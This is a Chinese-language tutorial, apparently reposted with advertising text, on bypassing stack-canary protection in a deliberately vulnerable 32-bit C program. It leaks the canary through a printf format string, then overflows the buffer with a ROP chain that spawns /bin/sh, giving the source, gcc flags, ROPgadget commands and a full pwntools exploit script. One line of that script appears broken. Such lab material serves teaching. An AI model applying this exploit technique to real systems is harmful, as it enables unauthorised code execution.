构造带有堆栈保护的指令流

1. 引言

成都做网站、网站设计、外贸营销网站建设服务团队是一支充满着热情的团队，执着、敏锐、追求更好，是创新互联的标准与要求，同时竭诚为客户提供服务是我们的理念。创新互联把每个网站当做一个产品来开发，精雕细琢，追求一名工匠心中的细致，我们更用心！

我们在学ropgadgets与ret2syscall技术原理时，构造指令流时，是没有加堆栈保护的，比如下面的程序：

文件名：7.c

 
 
 
 
  
  
  
  
#include  
  
  
  
  
#include  
  
  
  
  
#include  
  
  
  
  
#include  
  
  
  
  
#include  
  
  
  
  
void exploit() 
  
  
  
  
{ 
  
  
  
  
    system("/bin/sh"); 
  
  
  
  
} 
  
  
  
  
void func() 
  
  
  
  
{ 
  
  
  
  
    char str[0x20]; 
  
  
  
  
    read(0,str,0x50); 
  
  
  
  
    printf(str); 
  
  
  
  
    read(0,str,0x50); 
  
  
  
  
} 
  
  
  
  
int main() 
  
  
  
  
{ 
  
  
  
  
    func(); 
  
  
  
  
    return 0; 
  
  
  
  
} 
 
 
 

我们是这样编译的，是没有加堆栈保护的，之后再利用ropgadgets构造指令流，就可以成功去执行execve(“/bin/sh”,null,null);。

 
 
 
 
  
  
  
  
gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c 
 
 
 

如果加上堆栈保护我们该怎么过呢?像下面这样编译：

 
 
 
 
  
  
  
  
gcc -no-pie -fstack-protector -static -m32 -o 7.exe 7.c 
 
 
 

显然我们就不能像原来一样构造指令流了，因为加入了堆栈保护。那我们该怎么办呢?我们可以利用格式化输出，将canary打印出来，然后再进行指令的组装。

2. 找地址

调试我们的程序，找到canary的地址，地址在：0xffffcfac

继续调试，直到printf，我们看看现在canary据栈顶的位置：0060，除以4等于15，说明传给第一个read函数的值为：%15$08x，就可以将canary打印出来了

重新调试，找到read函数把读进来的数据存放的地址：0xffffcf8c

将%15$08x给read函数，发现可以将canary打印出来

接下来就是利用好第二个read函数来构造rop链了。

3.  构造rop链

linux上系统调用原理：

• eax 系统调用号
• ebx 第一个参数
• ecx 第二个参数
• edx 第三个参数
• esi 第四个参数
• edi 第五个参数
• int 0×80

所以eax就存放execve函数的系统调用号11，ebx存放第一个参数/bin/sh，ecx存放第二个参数null，就是0，edx存放第三个参数，也是0

 
 
 
 
  
  
  
  
ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax" 
 
 
 

地址用：0x080b8546

 
 
 
 
  
  
  
  
ROPgadget --binary ./7.exe --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx" 
 
 
 

地址为：0x0806f210

 
 
 
 
  
  
  
  
ROPgadget --binary ./7.exe --string "/bin/sh" 
 
 
 

地址用：0x080bbd80

 
 
 
 
  
  
  
  
ROPgadget --binary ./7.exe --only "int"|grep "0x80" 
 
 
 

地址为：0x0806ce37

4. 写出poc

 
 
 
 
  
  
  
  
from pwn import * 
  
  
  
  
context(arch="i386",os="linux") 
  
  
  
  
p=process('./7.exe') 
  
  
  
  
p.sendline("%15$08x") 
  
  
  
  
canary=p.recv()[:8] 
  
  
  
  
print(canary) 
  
  
  
  
canarycanary=canary.decode("hex")[::-1]    
  
  
  
  
coffset=4*8                          
  
  
  
  
roffset=3*4                  
  
  
  
  
add_eax=p32(0x080b8546) 
  
  
  
  
value_eax=p32(0xb) 
  
  
  
  
add_edx_ecx_ebx=p32(0x0806f210) 
  
  
  
  
value_ebx=p32(0x080bbd80) 
  
  
  
  
value_ecx=p32(0) 
  
  
  
  
value_edx=p32(0) 
  
  
  
  
add_int=p32(0x0806ce37) 
  
  
  
  
payload=coffset*'a'+canary+roffset*'a'+add_eax+value_eax+add_edx_ecx_ebx+value_edx+value_ecx+value_ebx+add_int 
  
  
  
  
p.sendline(payload) 
  
  
  
  
p.interactive() 
 
 
 

从from pwn import *到canary=canary.decode(“hex”)[::-1]都是为了找出canary，因为加了堆栈保护，我们不能直接把数据打入到堆栈中，所以要先找出canary，然后构造payload，我们要把canary加进去，过堆栈保护，再在后面加上我们的rop链。

执行成功

5. 总结

开启了堆栈保护，加入了cookie，一旦我们破坏了堆栈，会引起系统保护，出现异常。但是我们还是需要构造我们的指令流，我们可以利用格式化输出，将canary打印出来，接下来我们可以利用读写函数，构造一个指令流，我们先去读，看一下堆栈的canary在哪里，然后我们canary搞出来，把canary再回填进去，进行组装，这样就即可以过堆栈保护，也可以构造我们的指令流了。

本文名称：构造带有堆栈保护的指令流
本文链接：http://www.shufengxianlan.com/qtweb/news16/306916.html

成都网站建设公司_创新互联，为您提供网站收录、App开发、建站公司、品牌网站设计、云服务器、企业网站制作

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联